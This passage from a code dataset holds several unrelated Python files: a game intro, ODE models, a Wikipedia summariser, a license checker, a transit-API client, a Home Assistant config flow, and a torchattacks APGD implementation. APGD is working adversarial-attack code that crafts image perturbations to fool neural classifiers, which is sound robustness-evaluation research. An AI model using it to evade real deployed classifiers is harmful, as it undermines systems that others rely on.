challeng\"\"\"\nfrom datetime import date, timedelta\nfrom math import sin\n\n\nWIDTH = 1024\nHEIGHT = 768\n\nday = date.today()\n\"\"\"current date\"\"\"\n\ntick = 0\n\npizza = Actor('pizza')\n\"\"\"the pizza to spin\"\"\"\n\nlandscape_a, landscape_b = Actor('landscape'), Actor('landscape')\n\n\ndef format_day(d):\n return d.strftime('%d %b %Y')\n\n\ndef position_landscape(offset):\n x = offset / 365\n # left hand side\n # x is initial offset of centre of image - full width * fraction\n landscape_a.pos = 1024 * 2 - (1024 * 4 * x), 768/2\n landscape_a.draw()\n\n # right hand side\n landscape_b.pos = 1024 * 6 - (1024 * 4 * x), 768/2\n landscape_b.draw()\n\n\ndef draw():\n offset = day.timetuple().tm_yday\n\n # put the background in at lowest z-index\n position_landscape(offset)\n\n # setup the pizza and its position\n pizza.pos = WIDTH / 2, 768 - 300 - sin(tick/20) * 50\n pizza.draw()\n\n screen.draw.textbox(\n format_day(day),\n Rect(\n (\n (1024/2) - 200,\n 25\n ),\n (\n (1024/2) - 50,\n 75\n ),\n )\n )\n\n\ndef update():\n global day, tick\n tick += 1\n day += timedelta(days=1)\n screen.clear()\n pizza.angle -= 360 / 365\n","sub_path":"shaunsfinger/intro.py","file_name":"intro.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"37037262","text":"import numpy as np\nfrom scipy.integrate import odeint\nimport tensorflow as tf\nfrom tensorflow.contrib.integrate import odeint as tf_odeint\n\nfrom transformation.base import transformation\n\nclass fhn_transformation(transformation):\n\tdef transform(self, X_prev):\n\t\t\"\"\"\n\t\tIntegrates the fhn ODEs\n\n\t\tInput:\n\t\tfhn_params = a, b, c, I, dt\n\t\ta: the shape of the cubic parabola\n\t\tb: describes the kinetics of the recovery variable w\n\t\tc: describes the 
kinetics of the recovery variable\n\t\tI: input current\n\t\tdt: timestep\n\n\t\tOutput\n\t\tX = [V, w]\n\t\t\tV - membrane voltage\n\t\t\tw - recovery variable that mimics activation of an outward current\n\t\t\"\"\"\n\t\ta, b, c, I, dt = self.params\n\n\t\tdef fhn_equation(X, t, a, b, c, I):\n\t\t\tV, w = X\n\t\t\tdVdt = V-V**3/3 - w + I\n\t\t\tdwdt = a*(b*V - c*w)\n\t\t\treturn [dVdt, dwdt]\n\n\t\tt = np.arange(0, 2*dt, dt)\n\t\tX = odeint(fhn_equation, X_prev, t, args = (a, b, c, I))[1, :]\n\n\t\treturn X\n\nclass tf_fhn_transformation(transformation):\n\tdef transform(self, X_prev):\n\t\t\"\"\"\n\t\tX_prev.shape = [B0, B1, ..., Bn, Dx]\n\t\t\"\"\"\n\t\ta, b, c, I, dt = self.params\n\n\t\tdef fhn_equation(X, t):\n\t\t\tV, w = tf.unstack(X, axis = -1)\n\t\t\tdVdt = V-V**3/3 - w + I\n\t\t\tdwdt = a*(b*V - c*w)\n\t\t\treturn tf.stack([dVdt, dwdt], axis = -1)\n\n\t\tt = np.arange(0.0, 2*dt, dt)\n\t\tX = tf.unstack(tf_odeint(fhn_equation, X_prev, t, name = \"loc\"), axis = 0)[1]\n\n\t\treturn X\n\n# test code\nif __name__ == \"__main__\":\n\timport matplotlib.pyplot as plt\n\tfhn_params = (1.0, 0.95, 0.05, 1.0, 0.15)\n\tDx = 2\n\tT = 20\n\tbatch_size = 10\n\n\t# for np ver\n\tfhn = fhn_transformation(fhn_params)\n\n\tX = np.zeros((T, Dx))\n\tX[0] = np.random.uniform(low = 0, high = 1, size = Dx)\n\tfor t in range(1,T):\n\t\tX[t] = fhn.transform(X[t-1])\n\n\tplt.figure()\n\tplt.plot(X[:, 0], X[:, 1])\n\tplt.show()\n\n\t# for tf ver\n\ttf_fhn = tf_fhn_transformation(fhn_params)\n\n\tXs = []\n\tX = tf.constant(np.random.uniform(low = -1, high = 1, size = (batch_size, Dx)), dtype = tf.float32)\n\tfor t in range(1, T):\n\t\tX = tf_fhn.transform(X)\n\t\tXs.append(X)\n\n\tinit = tf.global_variables_initializer()\n\tsess = tf.InteractiveSession()\n\tsess.run(init)\n\tXs = tf.stack(Xs, axis = 1).eval()\n\n\tplt.figure()\n\tfor i in range(batch_size):\n\t\tplt.plot(Xs[i, :, 0], Xs[i, :, 1])\n\tplt.show()\n","sub_path":"not_used/SMC_supreme/transformation/fhn.py","file_name":"fhn.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"440316253","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu May 9 15:47:36 2019\r\n\r\n@author: Shaurya Gupta\r\n\"\"\"\r\n\r\nimport bs4 as bs \r\nimport urllib.request \r\nimport re \r\nimport nltk \r\nfrom heapq import nlargest \r\n \r\ndef get_summary(url): \r\n data = urllib.request.urlopen(url) \r\n article = data.read() \r\n \r\n parsed_text = bs.BeautifulSoup(article,'lxml') \r\n paragraph = parsed_text.find_all('p', limit=10) \r\n \r\n article_text = \"\" \r\n \r\n for p in paragraph: \r\n article_text += p.text \r\n \r\n article_text = re.sub(r'\\[[0-9]*\\]', ' ', article_text) \r\n article_text = re.sub(r'\\s+', ' ', article_text) \r\n \r\n article_text = re.sub(r'\\[[a-zA-Z]*\\]', ' ', article_text) \r\n article_text = re.sub(r'\\s+', ' ', article_text) \r\n \r\n plain_text = re.sub('[^a-zA-Z]', ' ', article_text ) \r\n plain_text = re.sub(r'\\s+', ' ', plain_text) \r\n \r\n stopwords = nltk.corpus.stopwords.words('english') \r\n \r\n word_frequency = {} \r\n for word in nltk.word_tokenize(plain_text): \r\n if word not in stopwords: \r\n if word not in word_frequency.keys(): \r\n word_frequency[word] = 1 \r\n else: \r\n word_frequency[word] += 1 \r\n max_frequency = max(word_frequency.values()) \r\n \r\n for word in word_frequency.keys(): \r\n word_frequency[word] = (word_frequency[word]/max_frequency) \r\n \r\n sentences = 
nltk.sent_tokenize(article_text)\r\n \r\n sentence_score = {} \r\n for sent in sentences: \r\n for word in nltk.word_tokenize(sent.lower()): \r\n if word in word_frequency.keys(): \r\n if len(sent.split(' ')) < 40: \r\n if sent not in sentence_score.keys(): \r\n sentence_score[sent] = word_frequency[word] \r\n else: \r\n sentence_score[sent] += word_frequency[word] \r\n summarized_sents = nlargest(10, sentence_score, key=sentence_score.get)\r\n \r\n summary = ' '.join(summarized_sents) \r\n print(summary)\r\n \r\n \r\n\r\nimport requests \r\nimport sys \r\npgname = sys.argv[1]\r\nif pgname!='':\r\n pgname = pgname.title()\r\n pgname=pgname.replace(\" \",\"_\") \r\n flag = 0 \r\n h = \"Machine_Learning\"\r\n url='https://en.wikipedia.org/wiki/'+pgname\r\n\r\n r = requests.get(url) \r\n if r.status_code == 200: \r\n flag=1 \r\n else: \r\n print('Wikipedia page does not exist') \r\n \r\n if flag==1: \r\n get_summary(url)","sub_path":"summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"354964178","text":"import os\nimport wx\n\nfrom elibs import dict_to_prop\n\nfrom core import BASEDIR, log\n\n\nclass License:\n def __init__(self):\n self.license_file = os.path.join(BASEDIR, 'eservices.key')\n self.key = None\n self.company = None\n self.valid_date = None\n self.server_ip = None\n\n def _remove(self):\n import os\n os.remove(self.license_file)\n\n def load(self):\n from core import decrypt\n import json\n try:\n with open(self.license_file) as file:\n rd = file.read()\n dec_cfg = decrypt(rd)\n lic = dict_to_prop(json.loads(dec_cfg))\n import datetime\n valid_at = datetime.datetime.strptime(lic.ValidAt, '%Y-%m-%d')\n if valid_at < datetime.datetime.now():\n wx.MessageBox('Validade da licença expirada , o sistema será encerrado',\n 'Tempo expirado', wx.ICON_ERROR)\n file.close()\n self._remove()\n return False\n self.company = lic.Company\n self.valid_date = valid_at\n self.server_ip = lic.ServerIP\n return True\n except Exception as e:\n print(e)\n from core import log\n log.error(e)\n return False\n\n def check(self):\n if os.path.exists(self.license_file):\n try:\n self.load()\n except Exception as e:\n log.error(e)\n return False\n\n def save(self, config=dict):\n from core import encrypt\n import json\n enc_cfg = encrypt(json.dumps(config))\n print(config)\n try:\n with open(self.license_file, 'w', encoding='UTF8') as file:\n file.write(enc_cfg)\n return True\n except Exception as e:\n from core import log\n log.error(e)\n return False\n\n def verify(self):\n score = 0\n check_digit = self.key[0]\n check_digit_count = 0\n chunks = self.key.split('-')\n for chunk in chunks:\n if len(chunk) != 4:\n return False\n for char in chunk:\n if char == check_digit:\n check_digit_count += 1\n score += ord(char)\n if score == 1772 and check_digit_count == 5:\n return True\n return False\n\n def generate(self):\n import wmi\n c = wmi.WMI()\n for s in c.Win32_Processor():\n key = s.ProcessorId\n\n chunk = ''\n serial = ''\n count = 0\n for char in key:\n serial += char\n chunk += char\n count += 1\n if len(chunk) == 4 and not (len(key) == count):\n serial += '-'\n chunk = ''\n\n self.key = serial.upper()\n return self.key\n\n def get(self, machine, cpf, password):\n \"\"\"Constructs and sends a :class:`Request `.\n\n :param machine: machine name.\n :param cpf: CPF/CNPJ used for register.\n :param password: Password used just for authentication.\n \"\"\"\n import requests\n 
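# (added editor's note, not part of the original file) The endpoint below is the\n        # author's own registration service; the call is made without a timeout or\n        # network-error handling. A more defensive variant -- an assumption, not the\n        # original behavior -- would be:\n        #\n        #   try:\n        #       rs = requests.post(url, data=params, timeout=10)\n        #   except requests.RequestException as exc:\n        #       return False, str(exc)\n        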
params = dict(\n            machine=machine,\n            serialKey=self.key,\n            cpf=cpf,\n            password=password\n        )\n        rs = requests.post(\n            'https://ellitedev.herokuapp.com/api/v1/register/',\n            data=params\n        )\n        r = rs.json()\n        if rs.status_code == 200:\n            if self.save(r):\n                return True, r['Company']\n        return False, r['error']\n","sub_path":"core/license.py","file_name":"license.py","file_ext":"py","file_size_in_byte":3666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"172688414","text":"def calc_number(*args):\n    sum_num = 0\n    for i in args:\n        sum_num += i\n    return sum_num\n\n\nresult = 0\nflags = True\nwhile flags:\n    user_string = input('Enter numbers separated by spaces, q to quit: ')\n    user_list_str = user_string.split()\n    user_list = []\n    for val in user_list_str:\n        if val == 'q':\n            flags = False\n        else:\n            user_list.append(int(val))\n    result += calc_number(*user_list)\n    print(f'Intermediate sum = {result}')\n\nprint(f'Sum = {result}')\n","sub_path":"Lesson_3/task_5.py","file_name":"task_5.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"501807886","text":"import requests\nfrom datetime import datetime\nfrom xml.etree import ElementTree as ET\n\ndef get_next_trips(longitude, latitude, stop_station_id):\n    \"\"\" Returns a dict containing information about the next journeys from the given position to the station\n    with the given station id.\n    \n    :param float longitude: The longitude part of the user's position\n    :param float latitude: The latitude part of the user's position\n    :param int stop_station_id: The station id of the destination station\n    :return: the next journeys from the position to the destination\n    :rtype: dict\n    \"\"\"\n\n    j = {}\n    journey_nbr = 0\n    part_nbr = 0\n\n    #### Find a start station id from given position\n    start_stations = find_stations_by_pos(longitude, latitude)\n    start_station_id = start_stations[0][1]\n\n    #### Formatting start and stop stations to match Skånetrafikens API\n    start_station = \"a|\" + str(start_station_id) + \"|0\"\n    stop_station = \"a|\" + str(stop_station_id) + \"|0\"\n\n    ##### Collect the xml-tree from Skånetrafiken\n    tree = get_xml_tree('http://www.labs.skanetrafiken.se/v2.2/resultspage.asp',\n                        {'cmdaction': 'next', 'selPointFr': start_station, 'selPointTo': stop_station})\n\n    ##### Parse the xml-tree and extract what we need, busnbr, time to departure, start station etc.\n    for journey in tree.iter('{http://www.etis.fskab.se/v1.0/ETISws}Journey'):\n        part_nbr = 0\n        minutes_set = False\n        j[\"journey_\" + str(journey_nbr)] = {}\n\n        for routelink in journey.iter('{http://www.etis.fskab.se/v1.0/ETISws}RouteLink'):\n            if routelink.find(\"{http://www.etis.fskab.se/v1.0/ETISws}Line\").find(\"{http://www.etis.fskab.se/v1.0/ETISws}Name\").text == \"Gång\":\n                continue\n            \n            ##### Sort out the info we want from skanetrafikens XML\n            line = routelink.find(\"{http://www.etis.fskab.se/v1.0/ETISws}Line\")\n            transport_mode = line.find(\"{http://www.etis.fskab.se/v1.0/ETISws}TransportModeName\")\n            no = line.find(\"{http://www.etis.fskab.se/v1.0/ETISws}No\")\n            start_station = routelink.find(\"{http://www.etis.fskab.se/v1.0/ETISws}From\")\n            start_station_name = start_station.find(\"{http://www.etis.fskab.se/v1.0/ETISws}Name\")\n            stop_station = routelink.find(\"{http://www.etis.fskab.se/v1.0/ETISws}To\")\n            stop_station_name = stop_station.find(\"{http://www.etis.fskab.se/v1.0/ETISws}Name\")\n            dep_time = 
routelink.find(\"{http://www.etis.fskab.se/v1.0/ETISws}DepDateTime\")\n arr_time = routelink.find(\"{http://www.etis.fskab.se/v1.0/ETISws}ArrDateTime\")\n\n ##### Writes the JSON formatted dict we will return\n j[\"journey_\" + str(journey_nbr)][\"part_\" + str(part_nbr)] = {}\n j[\"journey_\" + str(journey_nbr)][\"part_\" + str(part_nbr)][\"transport_mode\"] = transport_mode.text\n j[\"journey_\" + str(journey_nbr)][\"part_\" + str(part_nbr)][\"line_number\"] = no.text\n j[\"journey_\" + str(journey_nbr)][\"part_\" + str(part_nbr)][\"start_station\"] = start_station_name.text\n j[\"journey_\" + str(journey_nbr)][\"part_\" + str(part_nbr)][\"stop_station\"] = stop_station_name.text\n j[\"journey_\" + str(journey_nbr)][\"part_\" + str(part_nbr)][\"dep_time\"] = dep_time.text\n j[\"journey_\" + str(journey_nbr)][\"part_\" + str(part_nbr)][\"arr_time\"] = arr_time.text\n \n if minutes_set == False: \n minutes = minutes_from_now(dep_time.text)\n j[\"journey_\" + str(journey_nbr)][\"minutes_from_now\"] = minutes\n minutes_set = True\n part_nbr += 1\n journey_nbr += 1\n\n return j\n\ndef find_station_by_name(searchStr):\n \"\"\" Returns a list containing information about the stations with names that somewhat matches the given search string.\n \n :param str searchStr: The serach string representing the name of a station\n :return: a list of stations with their names and id:s\n :rtype: list\n \"\"\"\n\n searchStr = searchStr.replace(\" \", \"+\")\n tree = get_xml_tree('http://www.labs.skanetrafiken.se/v2.2/querystation.asp?',\n {'inpPointFr': searchStr})\n result = []\n\n for dest in tree.iter('{http://www.etis.fskab.se/v1.0/ETISws}StartPoints'):\n for point in dest.iter('{http://www.etis.fskab.se/v1.0/ETISws}Point'):\n p = {}\n p[\"name\"] = point.find(\"{http://www.etis.fskab.se/v1.0/ETISws}Name\").text\n p[\"id\"] = point.find(\"{http://www.etis.fskab.se/v1.0/ETISws}Id\").text\n result.append(p)\n\n return result\n\n\n##### position är en gps-position. Returnerar ett stations-id enligt Skånetrafikens API, som en int\ndef find_stations_by_pos(longitude, latitude):\n \"\"\" Returns a list of stations that are close to the given position.\n \n :param float longitude: The longitude part of the users position\n :param float latitude: The latitude part of the users position\n :return: list of stations, consisting of names and id:s\n :rtype: list\n \"\"\"\n \n tree = get_xml_tree(\"http://www.labs.skanetrafiken.se/v2.2/neareststation.asp?\",\n {\"x\": latitude, \"y\": longitude, \"Radius\":500})\n result = []\n\n for stop_area in tree.iter('{http://www.etis.fskab.se/v1.0/ETISws}NearestStopArea'):\n name = stop_area.find(\"{http://www.etis.fskab.se/v1.0/ETISws}Name\").text\n id = stop_area.find(\"{http://www.etis.fskab.se/v1.0/ETISws}Id\").text\n result.append([name, id])\n\n return result\n\ndef get_xml_tree(url, params):\n \"\"\" Util-function for making a request through an url, with the given parameters.\n \n :param str url: The longitude part of the users position\n :param dict params: The latitude part of the users position\n :return: An xml-tree-object representing the response from the request.\n :rtype: xml.etree.ElementTree.Element\n \"\"\"\n response = requests.get(url, params=params)\n tree = ET.fromstring(response.content)\n return tree\n\ndef minutes_from_now(timestamp):\n \"\"\" Util-function for calculating the number of minutes from now until the given timestamp\n \n :param str timestamp: represents a given timestamp. 
formatted as example: 2019-01-15T18:40:00\n :return: a whole number representing the number of minutes from now until the time of the given timestamp\n :rtype: int\n \"\"\"\n \n now = datetime.now()\n\n l = timestamp.split(\"T\")\n date = l[0]\n time = l[1]\n\n dl = date.split(\"-\")\n year = int(dl[0])\n month = int(dl[1])\n day = int(dl[2])\n\n tl = time.split(\":\")\n hour = int(tl[0])\n min = int(tl[1])\n\n datetime_stamp = datetime(year, month, day, hour, min)\n minutes_diff = (datetime_stamp - now).total_seconds() / 60.0\n return int(round(minutes_diff))\n\nif __name__ == \"__main__\":\n print(get_next_trips(13.1070605, 55.6523299, 80000))\n # print(find_station_by_name(\"Malm c\"))\n # print(get_xml_tree('http://www.labs.skanetrafiken.se/v2.2/querystation.asp?',\n # {'inpPointFr': \"malmö\"}))\n # print(minutes_from_now(\"2019-01-16T18:40:00\"))","sub_path":"app/skanetrafiken.py","file_name":"skanetrafiken.py","file_ext":"py","file_size_in_byte":7102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"391661187","text":"import time\n\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\n\nfrom ..attack import Attack\n\n\nclass APGD(Attack):\n r\"\"\"\n APGD in the paper 'Reliable evaluation of adversarial robustness with an ensemble of diverse parameter-free attacks'\n [https://arxiv.org/abs/2003.01690]\n [https://github.com/fra31/auto-attack]\n\n Distance Measure : Linf, L2\n\n Arguments:\n model (nn.Module): model to attack.\n norm (str): Lp-norm of the attack. ['Linf', 'L2'] (Default: 'Linf')\n eps (float): maximum perturbation. (Default: 8/255)\n steps (int): number of steps. (Default: 10)\n n_restarts (int): number of random restarts. (Default: 1)\n seed (int): random seed for the starting point. (Default: 0)\n loss (str): loss function optimized. ['ce', 'dlr'] (Default: 'ce')\n eot_iter (int): number of iteration for EOT. (Default: 1)\n rho (float): parameter for step-size update (Default: 0.75)\n verbose (bool): print progress. (Default: False)\n\n Shape:\n - images: :math:`(N, C, H, W)` where `N = number of batches`, `C = number of channels`, `H = height` and `W = width`. 
It must have a range [0, 1].\n - labels: :math:`(N)` where each value :math:`y_i` is :math:`0 \\leq y_i \\leq` `number of labels`.\n - output: :math:`(N, C, H, W)`.\n\n Examples::\n >>> attack = torchattacks.APGD(model, norm='Linf', eps=8/255, steps=10, n_restarts=1, seed=0, loss='ce', eot_iter=1, rho=.75, verbose=False)\n >>> adv_images = attack(images, labels)\n\n \"\"\"\n\n def __init__(self, model, device=None, norm='Linf', eps=8/255, steps=10, n_restarts=1, seed=0, loss='ce', eot_iter=1, rho=.75, verbose=False):\n super().__init__('APGD', model, device)\n self.eps = eps\n self.steps = steps\n self.norm = norm\n self.n_restarts = n_restarts\n self.seed = seed\n self.loss = loss\n self.eot_iter = eot_iter\n self.thr_decr = rho\n self.verbose = verbose\n self.supported_mode = ['default']\n\n def forward(self, images, labels):\n r\"\"\"\n Overridden.\n \"\"\"\n\n images = images.clone().detach().to(self.device)\n labels = labels.clone().detach().to(self.device)\n _, adv_images = self.perturb(images, labels, cheap=True)\n\n return adv_images\n\n def check_oscillation(self, x, j, k, y5, k3=0.75):\n t = np.zeros(x.shape[1])\n for counter5 in range(k):\n t += x[j - counter5] > x[j - counter5 - 1]\n\n return t <= k*k3*np.ones(t.shape)\n\n def check_shape(self, x):\n return x if len(x.shape) > 0 else np.expand_dims(x, 0)\n\n def dlr_loss(self, x, y):\n x_sorted, ind_sorted = x.sort(dim=1)\n ind = (ind_sorted[:, -1] == y).float()\n\n return -(x[np.arange(x.shape[0]), y] - x_sorted[:, -2] * ind - x_sorted[:, -1] * (1. - ind)) / (x_sorted[:, -1] - x_sorted[:, -3] + 1e-12)\n\n def attack_single_run(self, x_in, y_in):\n x = x_in.clone() if len(x_in.shape) == 4 else x_in.clone().unsqueeze(0)\n y = y_in.clone() if len(y_in.shape) == 1 else y_in.clone().unsqueeze(0)\n\n self.steps_2, self.steps_min, self.size_decr = max(int(\n 0.22 * self.steps), 1), max(int(0.06 * self.steps), 1), max(int(0.03 * self.steps), 1)\n if self.verbose:\n print('parameters: ', self.steps, self.steps_2,\n self.steps_min, self.size_decr)\n\n if self.norm == 'Linf':\n t = 2 * torch.rand(x.shape).to(self.device).detach() - 1\n x_adv = x.detach() + self.eps * torch.ones([x.shape[0], 1, 1, 1]).to(self.device).detach() * t / (t.reshape([t.shape[0], -1]).abs().max(dim=1, keepdim=True)[0].reshape([-1, 1, 1, 1])) # nopep8\n elif self.norm == 'L2':\n t = torch.randn(x.shape).to(self.device).detach()\n x_adv = x.detach() + self.eps * torch.ones([x.shape[0], 1, 1, 1]).to(self.device).detach() * t / ((t ** 2).sum(dim=(1, 2, 3), keepdim=True).sqrt() + 1e-12) # nopep8\n x_adv = x_adv.clamp(0., 1.)\n x_best = x_adv.clone()\n x_best_adv = x_adv.clone()\n loss_steps = torch.zeros([self.steps, x.shape[0]])\n loss_best_steps = torch.zeros([self.steps + 1, x.shape[0]])\n acc_steps = torch.zeros_like(loss_best_steps)\n\n if self.loss == 'ce':\n criterion_indiv = nn.CrossEntropyLoss(reduction='none')\n elif self.loss == 'dlr':\n criterion_indiv = self.dlr_loss\n else:\n raise ValueError('unknown loss')\n\n x_adv.requires_grad_()\n grad = torch.zeros_like(x)\n for _ in range(self.eot_iter):\n with torch.enable_grad():\n # 1 forward pass (eot_iter = 1)\n logits = self.get_logits(x_adv)\n loss_indiv = criterion_indiv(logits, y)\n loss = loss_indiv.sum()\n\n # 1 backward pass (eot_iter = 1)\n grad += torch.autograd.grad(loss, [x_adv])[0].detach()\n\n grad /= float(self.eot_iter)\n grad_best = grad.clone()\n\n acc = logits.detach().max(1)[1] == y\n acc_steps[0] = acc + 0\n loss_best = loss_indiv.detach().clone()\n\n step_size = self.eps * 
torch.ones([x.shape[0], 1, 1, 1]).to(self.device).detach() * torch.Tensor([2.0]).to(self.device).detach().reshape([1, 1, 1, 1]) # nopep8\n x_adv_old = x_adv.clone()\n counter = 0\n k = self.steps_2 + 0\n u = np.arange(x.shape[0])\n counter3 = 0\n\n loss_best_last_check = loss_best.clone()\n reduced_last_check = np.zeros(\n loss_best.shape) == np.zeros(loss_best.shape)\n\n # n_reduced = 0\n for i in range(self.steps):\n # gradient step\n with torch.no_grad():\n x_adv = x_adv.detach()\n grad2 = x_adv - x_adv_old\n x_adv_old = x_adv.clone()\n\n a = 0.75 if i > 0 else 1.0\n\n if self.norm == 'Linf':\n x_adv_1 = x_adv + step_size * torch.sign(grad)\n x_adv_1 = torch.clamp(\n torch.min(torch.max(x_adv_1, x - self.eps), x + self.eps), 0.0, 1.0)\n x_adv_1 = torch.clamp(torch.min(torch.max(\n x_adv + (x_adv_1 - x_adv) * a + grad2 * (1 - a), x - self.eps), x + self.eps), 0.0, 1.0)\n\n elif self.norm == 'L2':\n x_adv_1 = x_adv + step_size * grad / ((grad ** 2).sum(dim=(1, 2, 3), keepdim=True).sqrt() + 1e-12) # nopep8\n x_adv_1 = torch.clamp(x + (x_adv_1 - x) / (((x_adv_1 - x) ** 2).sum(dim=(1, 2, 3), keepdim=True).sqrt() + 1e-12) * torch.min(self.eps * torch.ones(x.shape).to(self.device).detach(), ((x_adv_1 - x) ** 2).sum(dim=(1, 2, 3), keepdim=True).sqrt()), 0.0, 1.0) # nopep8\n x_adv_1 = x_adv + (x_adv_1 - x_adv) * a + grad2 * (1 - a)\n x_adv_1 = torch.clamp(x + (x_adv_1 - x) / (((x_adv_1 - x) ** 2).sum(dim=(1, 2, 3), keepdim=True).sqrt() + 1e-12) * torch.min(self.eps * torch.ones(x.shape).to(self.device).detach(), ((x_adv_1 - x) ** 2).sum(dim=(1, 2, 3), keepdim=True).sqrt() + 1e-12), 0.0, 1.0) # nopep8\n\n x_adv = x_adv_1 + 0.\n\n # get gradient\n x_adv.requires_grad_()\n grad = torch.zeros_like(x)\n for _ in range(self.eot_iter):\n with torch.enable_grad():\n # 1 forward pass (eot_iter = 1)\n logits = self.get_logits(x_adv)\n loss_indiv = criterion_indiv(logits, y)\n loss = loss_indiv.sum()\n\n # 1 backward pass (eot_iter = 1)\n grad += torch.autograd.grad(loss, [x_adv])[0].detach()\n\n grad /= float(self.eot_iter)\n\n pred = logits.detach().max(1)[1] == y\n acc = torch.min(acc, pred)\n acc_steps[i + 1] = acc + 0\n x_best_adv[(pred == 0).nonzero().squeeze()] = x_adv[(pred == 0).nonzero().squeeze()] + 0. 
# nopep8\n if self.verbose:\n print('iteration: {} - Best loss: {:.6f}'.format(i, loss_best.sum()))\n\n # check step size\n with torch.no_grad():\n y1 = loss_indiv.detach().clone()\n loss_steps[i] = y1.cpu() + 0\n ind = (y1 > loss_best).nonzero().squeeze()\n x_best[ind] = x_adv[ind].clone()\n grad_best[ind] = grad[ind].clone()\n loss_best[ind] = y1[ind] + 0\n loss_best_steps[i + 1] = loss_best + 0\n\n counter3 += 1\n\n if counter3 == k:\n fl_oscillation = self.check_oscillation(loss_steps.detach().cpu(\n ).numpy(), i, k, loss_best.detach().cpu().numpy(), k3=self.thr_decr)\n fl_reduce_no_impr = (~reduced_last_check) * (loss_best_last_check.cpu().numpy() >= loss_best.cpu().numpy()) # nopep8\n fl_oscillation = ~(~fl_oscillation * ~fl_reduce_no_impr)\n reduced_last_check = np.copy(fl_oscillation)\n loss_best_last_check = loss_best.clone()\n\n if np.sum(fl_oscillation) > 0:\n step_size[u[fl_oscillation]] /= 2.0\n n_reduced = fl_oscillation.astype(float).sum()\n\n fl_oscillation = np.where(fl_oscillation)\n\n x_adv[fl_oscillation] = x_best[fl_oscillation].clone()\n grad[fl_oscillation] = grad_best[fl_oscillation].clone()\n\n counter3 = 0\n k = np.maximum(k - self.size_decr, self.steps_min)\n\n return x_best, acc, loss_best, x_best_adv\n\n def perturb(self, x_in, y_in, best_loss=False, cheap=True):\n assert self.norm in ['Linf', 'L2']\n x = x_in.clone() if len(x_in.shape) == 4 else x_in.clone().unsqueeze(0)\n y = y_in.clone() if len(y_in.shape) == 1 else y_in.clone().unsqueeze(0)\n\n adv = x.clone()\n acc = self.get_logits(x).max(1)[1] == y\n # loss = -1e10 * torch.ones_like(acc).float()\n if self.verbose:\n print('-------------------------- running {}-attack with epsilon {:.4f} --------------------------'.format(self.norm, self.eps))\n print('initial accuracy: {:.2%}'.format(acc.float().mean()))\n startt = time.time()\n\n if not best_loss:\n torch.random.manual_seed(self.seed)\n torch.cuda.random.manual_seed(self.seed)\n\n if not cheap:\n raise ValueError('not implemented yet')\n\n else:\n for counter in range(self.n_restarts):\n ind_to_fool = acc.nonzero().squeeze()\n if len(ind_to_fool.shape) == 0:\n ind_to_fool = ind_to_fool.unsqueeze(0)\n if ind_to_fool.numel() != 0:\n x_to_fool, y_to_fool = x[ind_to_fool].clone(), y[ind_to_fool].clone() # nopep8\n best_curr, acc_curr, loss_curr, adv_curr = self.attack_single_run(x_to_fool, y_to_fool) # nopep8\n ind_curr = (acc_curr == 0).nonzero().squeeze()\n #\n acc[ind_to_fool[ind_curr]] = 0\n adv[ind_to_fool[ind_curr]] = adv_curr[ind_curr].clone()\n if self.verbose:\n print('restart {} - robust accuracy: {:.2%} - cum. 
time: {:.1f} s'.format(\n counter, acc.float().mean(), time.time() - startt))\n\n return acc, adv\n\n else:\n adv_best = x.detach().clone()\n loss_best = torch.ones([x.shape[0]]).to(self.device) * (-float('inf')) # nopep8\n for counter in range(self.n_restarts):\n best_curr, _, loss_curr, _ = self.attack_single_run(x, y)\n ind_curr = (loss_curr > loss_best).nonzero().squeeze()\n adv_best[ind_curr] = best_curr[ind_curr] + 0.\n loss_best[ind_curr] = loss_curr[ind_curr] + 0.\n\n if self.verbose:\n print('restart {} - loss: {:.5f}'.format(counter, loss_best.sum()))\n\n return loss_best, adv_best\n","sub_path":"torchattacks/attacks/apgd.py","file_name":"apgd.py","file_ext":"py","file_size_in_byte":12200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"398026527","text":"\"\"\"Config flow for Griddy Power integration.\"\"\"\nimport asyncio\nimport logging\n\nfrom aiohttp import ClientError\nfrom griddypower.async_api import LOAD_ZONES, AsyncGriddy\nimport voluptuous as vol\n\nfrom homeassistant import config_entries, core, exceptions\nfrom homeassistant.helpers import aiohttp_client\n\nfrom .const import CONF_LOADZONE\nfrom .const import DOMAIN # pylint:disable=unused-import\n\n_LOGGER = logging.getLogger(__name__)\n\nDATA_SCHEMA = vol.Schema({vol.Required(CONF_LOADZONE): vol.In(LOAD_ZONES)})\n\n\nasync def validate_input(hass: core.HomeAssistant, data):\n \"\"\"Validate the user input allows us to connect.\n\n Data has the keys from DATA_SCHEMA with values provided by the user.\n \"\"\"\n client_session = aiohttp_client.async_get_clientsession(hass)\n\n try:\n await AsyncGriddy(\n client_session, settlement_point=data[CONF_LOADZONE]\n ).async_getnow()\n except (asyncio.TimeoutError, ClientError) as err:\n raise CannotConnect from err\n\n # Return info that you want to store in the config entry.\n return {\"title\": f\"Load Zone {data[CONF_LOADZONE]}\"}\n\n\nclass ConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):\n \"\"\"Handle a config flow for Griddy Power.\"\"\"\n\n VERSION = 1\n CONNECTION_CLASS = config_entries.CONN_CLASS_CLOUD_POLL\n\n async def async_step_user(self, user_input=None):\n \"\"\"Handle the initial step.\"\"\"\n errors = {}\n info = None\n if user_input is not None:\n try:\n info = await validate_input(self.hass, user_input)\n except CannotConnect:\n errors[\"base\"] = \"cannot_connect\"\n except Exception: # pylint: disable=broad-except\n _LOGGER.exception(\"Unexpected exception\")\n errors[\"base\"] = \"unknown\"\n\n if \"base\" not in errors:\n await 